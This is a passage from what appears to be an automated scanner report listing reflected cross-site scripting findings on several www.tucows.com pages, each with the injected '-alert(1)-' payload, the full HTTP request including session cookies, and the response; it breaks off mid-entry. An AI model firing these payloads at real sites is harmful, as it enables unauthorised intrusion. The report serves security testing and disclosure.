The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0054"-alert(1)-"f4d5b36deb7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagesa0054"-alert(1)-"f4d5b36deb7/newassets/privacy.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:47 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a40ac"-alert(1)-"9549b461301 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassetsa40ac"-alert(1)-"9549b461301/privacy.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:02 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feb32"-alert(1)-"50d4670b506 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/privacy.htmlfeb32"-alert(1)-"50d4670b506 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:14 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.92. http://www.tucows.com/images/newassets/privacy.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/privacy.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1a3a"-alert(1)-"4dfa8e6d415 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/privacy.html?b1a3a"-alert(1)-"4dfa8e6d415=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:28 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60f39"-alert(1)-"f5b143ebb35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images60f39"-alert(1)-"f5b143ebb35/newassets/safesearchtoggle.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:25 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ffc5"-alert(1)-"d8706d26674 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets7ffc5"-alert(1)-"d8706d26674/safesearchtoggle.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:35 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e60fe"-alert(1)-"be3796b76d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/safesearchtoggle.htmle60fe"-alert(1)-"be3796b76d HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:44 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.96. http://www.tucows.com/images/newassets/safesearchtoggle.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/safesearchtoggle.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3b77"-alert(1)-"99a3ca1e499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/safesearchtoggle.html?d3b77"-alert(1)-"99a3ca1e499=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:59 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7005"-alert(1)-"da1cff69e08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagesa7005"-alert(1)-"da1cff69e08/newassets/search.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:37 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6080c"-alert(1)-"416c9945040 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets6080c"-alert(1)-"416c9945040/search.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:53 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86474"-alert(1)-"fc2d258ee4e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/search.html86474"-alert(1)-"fc2d258ee4e HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:07 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.100. http://www.tucows.com/images/newassets/search.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/search.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e494d"-alert(1)-"4b77aa9c219 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/search.html?e494d"-alert(1)-"4b77aa9c219=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:07 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af8d9"-alert(1)-"92a1570dd92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagesaf8d9"-alert(1)-"92a1570dd92/newassets/sitemap.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
